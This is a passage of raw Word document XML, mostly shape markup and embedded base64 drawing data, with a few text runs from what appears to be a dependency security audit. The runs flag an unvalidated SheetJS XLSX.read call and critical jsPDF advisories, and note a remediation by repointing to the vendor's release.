MDaZmOdFlkU9vEhinWKLca3I6N4VYS6n1oa&#10;JGNrDphoPpw5oFv53HHNDVeiQVwzR1jVMvOnaaFxI8V2GBScCkeJGzVE07aSKfz/fGiXr44ZHi7f&#10;DxrEdz5UvIqs9M6H52+FcNCe3ArV0ftiPmSMha8RIl3L5B3a6hFvTojkyU8ixJ95QYyQVycbNvb0&#10;leiqBhB7+p4FvcAiRILgDCEaU0Yzs5sYtTbVzAyNiwnR0pl2XsPxebs20LiSAvAKrhCe80rsjRfE&#10;GR8ZKbZK9zVU3glR1bL8zkIXH/WhxEbtnRDfL4gb94oLIn40hS/FeNEdvmrLT9HmO96wx2/vd/8B&#10;AAD//wMAUEsDBBQABgAIAAAAIQDfc81k3wAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BSsNA&#10;EIbvgu+wjOCt3Y2hIcZsSinqqQi2gnjbJtMkNDsbstskfXvHk739w3z8802+nm0nRhx860hDtFQg&#10;kEpXtVRr+Dq8LVIQPhiqTOcINVzRw7q4v8tNVrmJPnHch1pwCfnMaGhC6DMpfdmgNX7peiTendxg&#10;TeBxqGU1mInLbSeflEqkNS3xhcb0uG2wPO8vVsP7ZKZNHL2Ou/Npe/05rD6+dxFq/fgwb15ABJzD&#10;Pwx/+qwOBTsd3YUqLzoNKxU/M6phESsOTKQq4XBkNE1AFrm8faH4BQAA//8DAFBLAQItABQABgAI&#10;AAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsB&#10;Ai0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsB&#10;Ai0AFAAGAAgAAAAhAFNfjH0FBQAAwxcAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1s&#10;UEsBAi0AFAAGAAgAAAAhAN9zzWTfAAAACgEAAA8AAAAAAAAAAAAAAAAAXwcAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPMAAABrCAAAAAA=&#10;">
                <v:shape id="Shape 1660" o:spid="_x0000_s1027" style="position:absolute;width:8096;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8096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5oxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvhf6HZQq91Y09BBtdRaSF2oNgFPQ4ZsckmJ0N2TVGf33nUOhthvfmvW9mi8E1qqcu1J4NjEcJ&#10;KOLC25pLA/vd19sEVIjIFhvPZOBOARbz56cZZtbfeEt9HkslIRwyNFDF2GZah6Iih2HkW2LRzr5z&#10;GGXtSm07vEm4a/R7kqTaYc3SUGFLq4qKS351Bg7Nehv7/HO92RwdnR4/k4/rUBjz+jIsp6AiDfHf&#10;/Hf9bQU/TYVfvpER9PwXAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAHsFeaMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l800100,v2630,,4875,930,6735,2778c808695,4638,809625,6890,809625,9525r,123825c809625,135973,808695,138212,806835,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,809625,142875"/>
                </v:shape>
                <v:shape id="Shape 1669" o:spid="_x0000_s1028" style="position:absolute;left:3524;top:1809;width:6953;height:1334;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oXxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/Q/LFHrTXT2kGl1FCoW2EIqPg96G7JhEs7Mhu9Wkv75bELzNx/ecxaqztbhS6yvHGsYjBYI4&#10;d6biQsN+9z6cgvAB2WDtmDT05GG1fBosMDXuxhu6bkMhYgj7FDWUITSplD4vyaIfuYY4cifXWgwR&#10;toU0Ld5iuK3lRKlEWqw4NpTY0FtJ+WX7YzV879Vrfz6Y3+ZrU2dZpo6TXn1q/fLcrecgAnXhIb67&#10;P0ycnyQz+P8mniCXfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBDzzoXxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l685800,v2630,,4875,930,6735,2791c694395,4651,695325,6890,695325,9525r,114300c695325,126448,694395,128687,692535,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695325,133350"/>
                </v:shape>
                <v:shape id="Shape 1672" o:spid="_x0000_s1029" style="position:absolute;left:11144;top:1809;width:8096;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8096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M02wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X+h+WKfSmm0pRia4SA5ZAT0ZFj0N2zIZmZ0N2q7G/3i0UepvH+5zlerCtuFLvG8cK3sYJCOLK&#10;6YZrBYf9djQH4QOyxtYxKbiTh/Xq+WmJqXY33tG1DLWIIexTVGBC6FIpfWXIoh+7jjhyF9dbDBH2&#10;tdQ93mK4beUkSabSYsOxwWBHuaHqq/y2Ct5/zOfHOS8OR3cqSn3PM7KbTKnXlyFbgAg0hH/xn7vQ&#10;cf50NoHfb+IJcvUAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEACfTNNsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l800100,v2630,,4876,930,6735,2791c808695,4651,809625,6890,809625,9525r,114300c809625,126448,808695,128687,806835,130547v-1859,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,809625,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">via </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GrnAdjust.jsx:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1222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which validates </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nothing</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> before calling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XLSX.read</w:t>
      </w:r>
      <w:proofErr w:type="spell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npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> audit fix</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot resolve this: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SheetJS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> no longer publishes to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, so the registry's newest version is the vulnerable one. Repointed to the vendor's own distribution at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0.20.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5544C741" w14:textId="12096EAD" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="53" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="364" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00226A5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>jspdf@3.0.4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 advisories rated critical including PDF injection allowing arbitrary JavaScript. Reachable because</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9CE7D9" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="147" w:line="310" w:lineRule="auto"/>
        <w:ind w:left="322" w:right="347"/>
        <w:jc w:val="both"/>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33696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73871AC5" wp14:editId="211AF3E0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>65782</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-182089</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1314450" cy="933450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27475" name="Group 27475"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1314450" cy="933450"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1314450" cy="933450"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1681" name="Shape 1681"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="47625"/>
                            <a:ext cx="38100" cy="38100"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="38100" h="38100">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="21576" y="0"/>
                                  <a:pt x="24006" y="484"/>
                                  <a:pt x="26340" y="1439"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="28674" y="2400"/>
                                  <a:pt x="30734" y="3777"/>
                                  <a:pt x="32520" y="5569"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34307" y="7348"/>
                                  <a:pt x="35683" y="9413"/>
                                  <a:pt x="36650" y="11745"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="37617" y="14083"/>
                                  <a:pt x="38100" y="16520"/>
                                  <a:pt x="38100" y="19050"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="38100" y="21568"/>
                                  <a:pt x="37617" y="23986"/>
                                  <a:pt x="36650" y="26324"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35683" y="28656"/>
                                  <a:pt x="34307" y="30714"/>
                                  <a:pt x="32520" y="32507"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="30734" y="34286"/>
                                  <a:pt x="28674" y="35663"/>
                                  <a:pt x="26340" y="36630"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24006" y="37598"/>
                                  <a:pt x="21576" y="38088"/>
                                  <a:pt x="19050" y="38100"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="38088"/>
                                  <a:pt x="14094" y="37598"/>
                                  <a:pt x="11760" y="36630"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="35663"/>
                                  <a:pt x="7366" y="34286"/>
                                  <a:pt x="5580" y="32507"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="30714"/>
                                  <a:pt x="2417" y="28656"/>
                                  <a:pt x="1450" y="26324"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="483" y="23986"/>
                                  <a:pt x="0" y="21568"/>
                                  <a:pt x="0" y="19050"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="16520"/>
                                  <a:pt x="483" y="14083"/>
                                  <a:pt x="1450" y="11745"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9413"/>
                                  <a:pt x="3793" y="7348"/>
                                  <a:pt x="5580" y="5569"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3777"/>
                                  <a:pt x="9426" y="2400"/>
                                  <a:pt x="11760" y="1439"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14094" y="484"/>
                                  <a:pt x="16524" y="0"/>
                                  <a:pt x="19050" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="152235"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1682" name="Shape 1682"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="133350" y="0"/>
                            <a:ext cx="695325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4638"/>
                                  <a:pt x="695325" y="6890"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="126448"/>
                                  <a:pt x="694395" y="128687"/>
                                  <a:pt x="692535" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="132407"/>
                                  <a:pt x="688430" y="133338"/>
                                  <a:pt x="6858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91" name="Shape 1691"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="133350" y="342900"/>
                            <a:ext cx="666750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="666750" h="133350">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="657225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="659855" y="0"/>
                                  <a:pt x="662100" y="930"/>
                                  <a:pt x="663960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="665820" y="4638"/>
                                  <a:pt x="666750" y="6890"/>
                                  <a:pt x="666750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="666750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="666750" y="126454"/>
                                  <a:pt x="665820" y="128699"/>
                                  <a:pt x="663960" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="662100" y="132420"/>
                                  <a:pt x="659855" y="133350"/>
                                  <a:pt x="657225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>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00" name="Shape 1700"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="447675" y="790575"/>
                            <a:ext cx="866775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="930"/>
                                  <a:pt x="863985" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4638"/>
                                  <a:pt x="866775" y="6890"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="135979"/>
                                  <a:pt x="865845" y="138224"/>
                                  <a:pt x="863985" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="141945"/>
                                  <a:pt x="859880" y="142875"/>
                                  <a:pt x="857250"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1C01A6D8" id="Group 27475" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.2pt;margin-top:-14.35pt;width:103.5pt;height:73.5pt;z-index:-251382784" coordsize="13144,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&